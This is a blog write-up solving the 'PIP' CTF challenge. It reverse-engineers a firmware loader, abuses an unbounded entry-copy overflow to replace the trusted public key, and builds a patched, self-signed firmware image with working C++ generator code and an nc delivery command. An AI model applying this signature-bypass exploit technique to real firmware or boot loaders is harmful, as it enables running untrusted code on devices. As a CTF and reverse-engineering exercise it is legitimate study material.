Reverse engineering, Windows internals, x86 magic, low level programming, and everything else I feel like writing about.

CrySyS SecChallenge 2020: PIP

This one is not for the faint of heart. Maybe you want to look at this once you are done with everything else. Good luck!

This challenge had an environment accessible over raw TCP. You can simulate running the payload with ./pip payload.bin

Categories

Offensive, Linux, Reverse Engineering

Files

Solution

I advise you to watch the talk linked earlier. Not only is it the solution to this challenge, it is also an interesting talk. The thing we want to exploit here is the very same as in the linked talk. We start off by checking main:

// Entry point of the target binary (decompiler output).
// With no command-line argument it calls receiveFw() and, if that succeeds,
// loads "./pipfw.bin"; with an argument it loads the file named by argv[1].
// Always returns 0.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  // Mode 2 with a null buffer on all three standard streams
  // (presumably _IONBF, i.e. unbuffered I/O on glibc - confirm).
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  if ( argc == 1 )
  {
    // No path given: receiveFw() is not shown here; presumably it stores the
    // uploaded image as ./pipfw.bin, which is then loaded - confirm.
    if ( receiveFw() )
      readfw("./pipfw.bin");
  }
  else
  {
    // Local testing path: load the firmware image straight from argv[1].
    readfw(argv[1]);
  }
  return 0;
}

Pretty helpful, this lets us easily test locally. Let’s check what readfw does:

// Loads and runs a firmware image from fwPath (decompiler output).
// Steps: read the file, verify it as a FlatBuffer, load the public key via
// loadpub(), map the boot loader and (only if that succeeded) the BIOS, then
// join every thread recorded in moduleThreads.
// fwPath: path of the firmware image to read.
void __cdecl readfw(const char *fwPath)
{
  int fwSize; // [rsp+1Ch] [rbp-74h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> >::iterator __for_begin; // [rsp+20h] [rbp-70h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> >::iterator __for_end; // [rsp+28h] [rbp-68h]
  char *buf; // [rsp+30h] [rbp-60h]
  const pip::FwHeader *fw; // [rsp+38h] [rbp-58h]
  std::vector<long unsigned int*,std::allocator<long unsigned int*> > *__for_range; // [rsp+40h] [rbp-50h]
  pthread_t *thread; // [rsp+48h] [rbp-48h]
  flatbuffers::Verifier verifier; // [rsp+50h] [rbp-40h]
  unsigned __int64 v9; // [rsp+88h] [rbp-8h]

  // Presumably the stack-protector canary read from fs:0x28 - confirm.
  v9 = __readfsqword(0x28u);
  fwSize = 0;
  buf = readf(fwPath, &fwSize);
  if ( buf )
  {
    // NOTE(review): 0x40 / 0xF4240 / 1 look like the Verifier's max depth (64),
    // max tables (1,000,000) and alignment-check flag - confirm against the
    // flatbuffers::Verifier constructor.
    flatbuffers::Verifier::Verifier(&verifier, (const uint8_t *)buf, fwSize, 0x40u, 0xF4240u, 1);
    if ( !pip::VerifyFwHeaderBuffer(&verifier) )
    {
      puts("[+PIP] Firmware seems malformed, halting execution.");
    }
    else
    {
      fw = pip::GetFwHeader(buf);
      // Nothing is mapped unless loadpub() reports a valid public key.
      if ( loadpub(fw) )
      {
        puts("[+PIP] Loading boot loader..");
        if ( mapModules(fw, DirectoryEntryType_PIP_FW_BOOT_LOADER) )
        {
          // The BIOS is only attempted after the boot loader mapped successfully.
          puts("[+PIP] Loading BIOS..");
          if ( !mapModules(fw, DirectoryEntryType_PIP_FW_BIOS) )
            puts("[+PIP] Seems like the developers were too lazy to implement the BIOS..");
        }
        puts("[+PIP] Done reading firmware, waiting for module threads");
        // Range-for over moduleThreads: join each stored pthread_t.
        __for_range = &moduleThreads;
        __for_begin._M_current = std::vector<unsigned long *,std::allocator<unsigned long *>>::begin(&moduleThreads)._M_current;
        __for_end._M_current = std::vector<unsigned long *,std::allocator<unsigned long *>>::end(__for_range)._M_current;
        while ( __gnu_cxx::operator!=<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>(
                  &__for_begin,
                  &__for_end) )
        {
          thread = *__gnu_cxx::__normal_iterator<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>::operator*(&__for_begin);
          pthread_join(*thread, 0LL);
          __gnu_cxx::__normal_iterator<unsigned long **,std::vector<unsigned long *,std::allocator<unsigned long *>>>::operator++(&__for_begin);
        }
      }
      else
      {
        puts("Failed to load unknown public key, please use the public key provided by the manufacturer.");
      }
      // Printed for every image that passed verification, whether or not the
      // public key was accepted.
      puts("[+PIP] Exiting");
    }
  }
  else
  {
    puts("[+PIP] Missing firmware");
  }
}

Seems like it is a FlatBuffer file. Checking the verify functions we discover the FlatBuffer identifier they use is IPFW. After checking out some of the other functions, we will notice some interesting things going on in loadpub:

// Walks every DirectoryEntry of every Directory in the firmware (decompiler
// output) and handles two entry types:
//   type 0 - public key: its SHA-512 is compared with the 0x40 bytes at
//            unk_8460; on a match the key is strcpy'd to gEmbeddedMemory.pubKey.
//   type 4 - raw data: at most 256 bytes are memcpy'd into the next slot of
//            gEmbeddedMemory.entries.
// fw: verified firmware header.
// Returns the last value assigned to `result`: 1 after a public key matched,
// 0 after a mismatch or if no type 0 entry was seen.
bool __cdecl loadpub(const pip::FwHeader *fw)
{
  const pip::Directory *v1; // rax
  const pip::Directory *v2; // rax
  const pip::DirectoryEntry *v3; // rax
  const pip::DirectoryEntry *v4; // rax
  const flatbuffers::Vector<unsigned char> *v5; // rax
  const pip::DirectoryEntry *v6; // rax
  const flatbuffers::Vector<unsigned char> *v7; // rax
  int v8; // eax
  const pip::DirectoryEntry *v9; // rax
  const pip::DirectoryEntry *v10; // rax
  const flatbuffers::Vector<unsigned char> *v11; // rax
  size_t v12; // rbx
  const pip::DirectoryEntry *v13; // rax
  const flatbuffers::Vector<unsigned char> *v14; // rax
  const unsigned __int8 *v15; // rax
  char result; // [rsp+1Bh] [rbp-55h]
  int size1; // [rsp+1Ch] [rbp-54h]
  int entryCounter; // [rsp+20h] [rbp-50h]
  int copySize; // [rsp+24h] [rbp-4Ch]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> it; // [rsp+28h] [rbp-48h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> it2; // [rsp+30h] [rbp-40h]
  const flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> size2; // [rsp+38h] [rbp-38h]
  const unsigned __int8 *fwPub; // [rsp+40h] [rbp-30h]
  uint8_t *publicHash; // [rsp+48h] [rbp-28h]
  char *known; // [rsp+50h] [rbp-20h]
  unsigned __int64 v27; // [rsp+58h] [rbp-18h]

  // Presumably the stack-protector canary read from fs:0x28 - confirm.
  v27 = __readfsqword(0x28u);
  entryCounter = 0;
  result = 0;
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&it);
  // Outer loop: one iteration per Directory.
  while ( 1 )
  {
    pip::FwHeader::directories(fw);
    // `size2` is reused by the decompiler as a scratch slot: here it holds the
    // end iterator, further down the entry data size.
    flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&size2);
    if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator<(&it, &size2) )
      return result;
    v1 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
    pip::Directory::entries(v1);
    flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&it2);
    // Inner loop: one iteration per DirectoryEntry of the current Directory.
    while ( 1 )
    {
      v2 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
      pip::Directory::entries(v2);
      flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&size2);
      if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator<(
              &it2,
              (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *)&size2) )
        break;
      v3 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
      // Type 0: public key entry.
      if ( pip::DirectoryEntry::type(v3) == 0 )
      {
        v4 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v5 = pip::DirectoryEntry::entryData(v4);
        fwPub = flatbuffers::Vector<unsigned char>::data(v5);
        v6 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v7 = pip::DirectoryEntry::entryData(v6);
        v8 = flatbuffers::Vector<unsigned char>::size(v7);
        publicHash = calcSha512((uint8_t *)fwPub, v8);
        known = (char *)&unk_8460;
        // Compare the 64-byte digest with the value embedded at unk_8460.
        if ( memcmp(publicHash, &unk_8460, 0x40uLL) )
        {
          puts("[+PIP] Firmware's pubkey is corrupted!");
          result = 0;
          // Leaves only the inner loop; the outer loop still advances to the
          // next Directory.
          break;
        }
        puts("[+PIP] Found valid pubkey!");
        // Copies up to the first NUL byte of the entry data; no length check
        // against the destination is visible here.
        strcpy(gEmbeddedMemory.pubKey, (const char *)fwPub);
        result = 1;
      }
      v9 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
      // Type 4: raw data copied into the next gEmbeddedMemory.entries slot.
      if ( pip::DirectoryEntry::type(v9) == 4 )
      {
        size1 = 256;
        v10 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v11 = pip::DirectoryEntry::entryData(v10);
        LODWORD(size2.data_) = flatbuffers::Vector<unsigned char>::size(v11);
        // copySize = min(256, size of the entry data).
        copySize = *std::min<int>(&size1, (const int *)&size2);
        v12 = copySize;
        v13 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
        v14 = pip::DirectoryEntry::entryData(v13);
        v15 = flatbuffers::Vector<unsigned char>::data(v14);
        // entryCounter is post-incremented and never compared with any limit,
        // so each further type 4 entry writes one slot further on.
        memcpy(&gEmbeddedMemory.entries[(__int64)entryCounter++], v15, v12);
      }
      flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator++(
        (flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *const)&size2,
        (unsigned __int64)&it2);
    }
    flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator++(
      (flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *const)&size2,
      (unsigned __int64)&it);
  }
}

There are a few things to notice here:

  • Public keys can be loaded into gEmbeddedMemory.pubKey, but are hash checked, just as with AMD
  • Data of DirectoryEntry of type 4 is copied into the next slot in gEmbeddedMemory.entries, but at most 256 bytes
  • The number of entries is not limited in any way, so adding more of them than there are slots is a buffer overflow

So what can we overwrite with this?

00000000 embeddedMemory  struc ; (sizeof=0x800, copyof_794)
00000000                                         ; XREF: .bss:gEmbeddedMemory/r
00000000 entries         RawDirectoryEntry 4 dup(?)
00000400 pubKey          db 1024 dup(?)          ; XREF: lsfw(pip::FwHeader const*)+1F2/o
00000400                                         ; mapModules(pip::FwHeader const*,pip::DirectoryEntryType)+1D1/o ...
00000800 embeddedMemory  ends

Just as with AMD, the public key. With this, we decide we’re going to take the following course:

  1. We add the original public key, as we need to return true to have the rest of the code run.
  2. We add 4 entries with any data, to get to the fifth slot.
  3. We add entries for each 256 bytes of our own public key, overwriting the original public key.

Now we only need to make a firmware and sign it with our own key. Let’s see how firmwares are loaded in mapModules:

// Finds the first DirectoryEntry whose type equals loadType, verifies its
// signature against the key stored in gEmbeddedMemory.pubKey and, if valid,
// inflates the entry data and hands it to dlblob() (decompiler output).
// fw:       verified firmware header.
// loadType: entry type to look for.
// Returns 1 if a module was loaded; 0 if no entry of that type exists or the
// entry found is unsigned or fails verification.
bool __cdecl mapModules(const pip::FwHeader *fw, pip::DirectoryEntryType loadType)
{
  const pip::Directory *v2; // rax
  const pip::Directory *v3; // rax
  const pip::DirectoryEntry *v4; // rax
  const pip::DirectoryEntry *v5; // rax
  const pip::DirectoryEntry *v6; // rax
  bool v7; // al
  int signatureSize; // er14
  uint8_t *signature; // r12
  int plainTextSize; // er13
  uint8_t *plainText; // rbx
  const char *const *v12; // rax
  const pip::DirectoryEntry *v13; // rax
  int v14; // er12
  int v15; // ebx
  const unsigned __int8 *v16; // rax
  bool result; // al
  bool validSignature; // [rsp+16h] [rbp-AAh]
  bool isSigned; // [rsp+17h] [rbp-A9h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> it; // [rsp+18h] [rbp-A8h]
  flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> it2; // [rsp+20h] [rbp-A0h]
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > v22; // [rsp+28h] [rbp-98h]
  const flatbuffers::Vector<unsigned char> *data; // [rsp+30h] [rbp-90h]
  const flatbuffers::Vector<unsigned char> *sign; // [rsp+38h] [rbp-88h]
  uint64_t decompressedSize; // [rsp+40h] [rbp-80h]
  uint8_t *inflated; // [rsp+48h] [rbp-78h]
  std::string lpub; // [rsp+50h] [rbp-70h]
  std::string p_publicKey; // [rsp+70h] [rbp-50h]
  unsigned __int64 v29; // [rsp+98h] [rbp-28h]

  // Presumably the stack-protector canary read from fs:0x28 - confirm.
  v29 = __readfsqword(0x28u);
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::Directory> > *const)&it);
  // LABEL_2 is the head of the outer (per-Directory) loop.
LABEL_2:
  pip::FwHeader::directories(fw);
  flatbuffers::Vector<flatbuffers::Offset<pip::Directory>>::end(&v22);
  // All directories visited without a match: nothing to load.
  if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator<(
          &it,
          (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *)&v22) )
    return 0;
  v2 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
  pip::Directory::entries(v2);
  flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::begin((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&it2);
  // Inner loop over the entries of the current Directory.
  while ( 1 )
  {
    v3 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator->(&it);
    pip::Directory::entries(v3);
    flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry>>::end((const flatbuffers::Vector<flatbuffers::Offset<pip::DirectoryEntry> > *const)&v22);
    if ( !flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator<(
            &it2,
            (const flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *)&v22) )
    {
      // Entries exhausted: advance to the next Directory and start over.
      flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,pip::Directory const*>::operator++(
        (flatbuffers::VectorIterator<flatbuffers::Offset<pip::Directory>,const pip::Directory*> *const)&v22,
        (unsigned __int64)&it);
      goto LABEL_2;
    }
    v4 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
    // Stop at the first entry of the requested type; later ones are never seen.
    if ( loadType == pip::DirectoryEntry::type(v4) )
      break;
    flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator++(
      (flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,const pip::DirectoryEntry*> *const)&v22,
      (unsigned __int64)&it2);
  }
  v5 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
  data = pip::DirectoryEntry::entryData(v5);
  v6 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
  sign = pip::DirectoryEntry::signature(v6);
  // The entry counts as signed only if a non-empty signature vector is present.
  v7 = sign && flatbuffers::Vector<unsigned char>::size(sign);
  isSigned = v7;
  validSignature = 0;
  if ( v7 )
  {
    // The key is taken from gEmbeddedMemory.pubKey as a NUL-terminated C string.
    std::allocator<char>::allocator(&v22);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<std::allocator<char>>(
      &lpub,
      gEmbeddedMemory.pubKey,
      (const std::allocator<char> *)&v22);
    std::allocator<char>::~allocator(&v22);
    signatureSize = flatbuffers::Vector<unsigned char>::size(sign);
    signature = (uint8_t *)flatbuffers::Vector<unsigned char>::data(sign);
    plainTextSize = flatbuffers::Vector<unsigned char>::size(data);
    plainText = (uint8_t *)flatbuffers::Vector<unsigned char>::data(data);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&p_publicKey, &lpub);
    // The signature is checked over the raw entry data, i.e. before inflating.
    validSignature = verifySignatureData(&p_publicKey, plainText, plainTextSize, signature, signatureSize);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&p_publicKey);
    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&lpub);
  }
  if ( isSigned && validSignature )
  {
    v12 = pip::EnumNamesDirectoryEntryType();
    printf("[+PIP] Found module %s with valid signature, loading..\n", v12[loadType]);
    v13 = flatbuffers::VectorIterator<flatbuffers::Offset<pip::DirectoryEntry>,pip::DirectoryEntry const*>::operator->(&it2);
    // The output buffer size comes from the firmware file; the malloc result
    // is passed on without a null check.
    decompressedSize = pip::DirectoryEntry::decompressedSize(v13);
    inflated = (uint8_t *)malloc(decompressedSize);
    v14 = decompressedSize;
    v15 = flatbuffers::Vector<unsigned char>::size(data);
    v16 = flatbuffers::Vector<unsigned char>::data(data);
    // The data is always inflated; no isCompressed flag is consulted here.
    inflate(v16, v15, inflated, v14);
    dlblob(inflated, decompressedSize);
    result = 1;
  }
  else
  {
    // Reached for unsigned entries as well as for bad signatures.
    puts("[+PIP] Found module but signature is invalid.");
    result = 0;
  }
  return result;
}

Checking dlblob shows it just loads a module from memory and calls its _Z4loadv export:

// Loads a shared object from memory and starts its entry point on a new
// thread (decompiler output).
// The blob is written to a memfd, opened with dlopen() through its
// /proc/<pid>/fd/<fd> path, and the symbol "_Z4loadv" is run via startModule.
// blob: module image to load.
// len:  number of bytes in blob.
void __cdecl dlblob(const void *blob, size_t len)
{
  unsigned int v2; // eax
  unsigned int shm_fd; // [rsp+14h] [rbp-42Ch]
  pthread_t *loaderThread; // [rsp+18h] [rbp-428h]
  void *handle; // [rsp+20h] [rbp-420h]
  void *loadea; // [rsp+28h] [rbp-418h]
  char path[1024]; // [rsp+30h] [rbp-410h]
  unsigned __int64 v8; // [rsp+438h] [rbp-8h]

  // Presumably the stack-protector canary read from fs:0x28 - confirm.
  v8 = __readfsqword(0x28u);
  // Flag 1 is presumably MFD_CLOEXEC - confirm. The returned descriptor is
  // not checked for failure.
  shm_fd = memfd_create("pip", 1u);
  // The return value of write() is ignored.
  write(shm_fd, blob, len);
  v2 = getpid();
  snprintf(path, 0x400uLL, "/proc/%d/fd/%d", v2, shm_fd);
  // Mode 1 is presumably RTLD_LAZY - confirm. The handle goes to dlsym()
  // without a null check.
  handle = dlopen(path, 1);
  loadea = dlsym(handle, "_Z4loadv");
  if ( loadea )
  {
    // The pthread_t lives on the heap so its pointer can be kept in
    // moduleThreads.
    loaderThread = (pthread_t *)malloc(8uLL);
    pthread_create(loaderThread, 0LL, (void *(*)(void *))startModule, loadea);
    std::vector<unsigned long *,std::allocator<unsigned long *>>::push_back(&moduleThreads, &loaderThread);
  }
  else
  {
    puts("[+PIP] Unable to find module entry point.");
  }
}

As you can see, mapModules just searches for the first directory entry of type loadType, gets its data and signature, then verifies the signature. If verification passes, it inflates the data and loads the resulting module. At this point I fired up gdb, placed a breakpoint at dlblob and ran ./pip pipfw_oem.bin, then proceeded to dump the original module from memory. Opening it up in IDA shows it’s pretty simple:

// Entry point of the dumped module (decompiler output).
// Reads flag.txt into the global `flag`, then spins for as long as `noPrint`
// is non-zero; the flag is only printed once that loop exits.
// Returns 0.
__int64 load(void)
{
  puts("[Loader] Hello world - from the Platform Insecurity Processor.");
  // The flag is read before the wait loop, so it is already in memory while
  // the loop spins.
  flag = (char *)readf("flag.txt", 0LL);
  puts("[Loader] Unfortunately the manufacturer has disabled printing the flag, sorry.");
  // Empty-bodied busy loop: never terminates while noPrint stays non-zero.
  while ( noPrint )
    ;
  puts(flag);
  return 0LL;
}

Checking noPrint shows it’s set as constant 1:

.data:0000000000004068 _ZL7noPrint     db 1

Simply patch it to 0 and export the resulting patched module to pipfw_patched.bin. We will deflate it, sign it with our own key, and add it as an entry of type 1 to our new firmware image. I made a signing key really quick for later use (outputs omitted):

user@ubuntu:~$ openssl genrsa -des3 -out private.pem 4096
user@ubuntu:~$ openssl rsa -in private.pem -outform PEM -pubout -out public.pem
user@ubuntu:~$ openssl rsa -in private.pem -outform PEM -out private_nopass.pem

Now we only need the format of the file. We already know it’s a FlatBuffer, so we only need to find out the schema used. Fortunately, searching for pip:: functions shows us all the offsets and therefore the order of the entries in the schema. Based on this I came up with the following schema:

// Schema reconstructed from the pip:: accessors found in the target binary.
// Field order matters: it determines the vtable slot of each field.

// One item of a Directory.
table DirectoryEntry {
  // Entry kind. Values seen in the target: 0 = public key, 1 = boot loader
  // module, 4 = raw data copied into gEmbeddedMemory.entries.
  type:ubyte;
  // Set on the boot loader entry of the original firmware; not read by the
  // mapModules code shown in this write-up.
  isCompressed:bool;
  // Size of the buffer mapModules allocates for the inflated module.
  decompressedSize:ulong;
  // Payload: key material, raw data, or the compressed module.
  entryData:[ubyte];
  // Signature over entryData; absent or empty means "unsigned".
  signature:[ubyte];
}

// A list of entries; the firmware holds a list of these.
table Directory {
  entries:[DirectoryEntry];
}

// Root table of the firmware image.
table Head {
  fwVerMajor:short;
  fwVerMinor:short;
  fwVerSubminor:short;
  // Purpose not identified; the original firmware carries 0x4741 here.
  unknown:short;
  directories:[Directory];
}

root_type Head;

Let’s try dumping the original firmware to see if our code works:

// Dumps the header fields and the directory entries of pipfw_oem.bin using
// the reconstructed schema. Used to check the schema against the original
// firmware.
// Returns 0 on success, 1 if the file could not be read.
int main()
{
  size_t sz;
  const auto data = getfile("pipfw_oem.bin", sz);
  if (!data)
    return 1;

  const auto head = GetHead(data);
  // %hX expects an unsigned short, so convert the signed field explicitly.
  printf(
    "%hd.%hd.%hd unknown: %04hX\n",
    head->fwVerMajor(),
    head->fwVerMinor(),
    head->fwVerSubminor(),
    static_cast<unsigned short>(head->unknown())
  );

  // FlatBuffers accessors return null for vectors that are absent from the
  // buffer, so guard both levels before iterating.
  const auto dirs = head->directories();
  if (!dirs)
    return 0;
  for (const auto* dir : *dirs)
  {
    const auto dir_entries = dir->entries();
    if (!dir_entries)
      continue;
    for (const auto* dir_entry : *dir_entries)
    {
      // uint64_t is not necessarily unsigned long long, so cast to the exact
      // type %llX expects.
      printf(
        "type %02X compressed %d, decompressed %016llX\n",
        static_cast<unsigned>(dir_entry->type()),
        static_cast<int>(dir_entry->isCompressed()),
        static_cast<unsigned long long>(dir_entry->decompressedSize())
      );
    }
  }
  return 0;
}

Output:

0.0.1337 unknown: 4741
type 00 compressed 0, decompressed 0000000000000000
type 01 compressed 1, decompressed 0000000000003FE8

All we need to do at this point is write a program that generates the new firmware image:

int main()
{
  size_t fw_decompressed_sz;
  const auto fw_decompressed = getfile("pipfw_patched.bin", fw_decompressed_sz);
  const auto compressor = libdeflate_alloc_compressor(9);
  auto fw = malloc(fw_decompressed_sz << 1);
  size_t fw_sz = libdeflate_zlib_compress(
    compressor,
    fw_decompressed,
    fw_decompressed_sz,
    fw,
    fw_decompressed_sz << 1
  );
  libdeflate_free_compressor(compressor);
  putfile("pipfw_patched_deflated.bin", fw, fw_sz);
  system("openssl dgst -sha256 -sign private_nopass.pem -out signature.sha256 pipfw_patched_deflated.bin");
  size_t fw_sig_sz;
  const auto fw_sig = getfile("signature.sha256", fw_sig_sz);
  size_t pub_sz;
  const auto pub = getfile("public.pem", pub_sz);
  size_t original_sz;
  const auto original = getfile("pipfw_oem.bin", original_sz);
  const auto head = GetHead(original);
  const DirectoryEntry* sig_entry = nullptr;
  for (const auto& dir : *head->directories())
    for (const auto& dir_entry : *dir->entries())
      if (dir_entry->type() == 0)
        sig_entry = dir_entry;
  assert(sig_entry);

  flatbuffers::FlatBufferBuilder fbb;
  std::uint8_t junk[256]{};
  std::vector<flatbuffers::Offset<DirectoryEntry>> entries;
  // Add original signature
  entries.push_back(
    CreateDirectoryEntry(
      fbb,
      0,
      false,
      0,
      fbb.CreateVector(
        sig_entry->entryData()->data(),
        sig_entry->entryData()->size()
      )
    )
  );

  // Add 1024 bytes of nothing
  for (auto i = 0u; i < 4; ++i)
    entries.push_back(
      CreateDirectoryEntry(
        fbb,
        4,
        false,
        0,
        fbb.CreateVector(
          junk,
          std::size(junk)
        )
      )
    );

  // Add our pubkey, split into 256 byte chunks
  for (auto i = 0u; i < pub_sz; i += 256)
    entries.push_back(
      CreateDirectoryEntry(
        fbb,
        4,
        false,
        0,
        fbb.CreateVector(
          (uint8_t*)pub + i,
          pub_sz - i
        )
      )
    );

  // Add our patched firmware and the signature for it
  entries.push_back(
    CreateDirectoryEntry(
      fbb,
      1,
      true,
      fw_decompressed_sz,
      fbb.CreateVector(
        (uint8_t*)fw,
        fw_sz
      ),
      fbb.CreateVector(
        (uint8_t*)fw_sig,
        fw_sig_sz
      )
    )
  );

  const auto new_head = CreateHead(
    fbb,
    head->fwVerMajor(),
    head->fwVerMinor(),
    head->fwVerSubminor(),
    head->unknown(),
    fbb.CreateVector(
      std::vector<flatbuffers::Offset<Directory>>{
        CreateDirectory(
          fbb,
          fbb.CreateVector(
            entries
          )
        )
      }
    )
  );

  fbb.Finish(new_head, "IPFW");
  const auto buf = fbb.GetBufferPointer();
  const auto size = fbb.GetSize();
  putfile("pipfw_cfw.bin", buf, size);
}

After generating the new firmware, we try running it against the server:

root@ubuntu:~# stat --printf="%s\n" pipfw_cfw.bin > answer.txt
root@ubuntu:~# cat answer.txt pipfw_cfw.bin - | nc 1.2.3.4 12345
Please upload platform firmware...
File size: Reading...
[+PIP] Found valid pubkey!
[+PIP] Loading boot loader..
[+PIP] Found module PIP_FW_BOOT_LOADER with valid signature, loading..
[+PIP] Loading BIOS..
[+PIP] Seems like the developers were too lazy to implement the BIOS..
[+PIP] Done reading firmware, waiting for module threads
[Loader] Hello world - from the Platform Insecurity Processor.
[Loader] Unfortunately the manufacturer has disabled printing the flag, sorry.
cd20{AyEmD_1S_N0T_1MPR3SS3D_0WN3R_C0NTR0L_1S_FUTIL3}

[+PIP] Exiting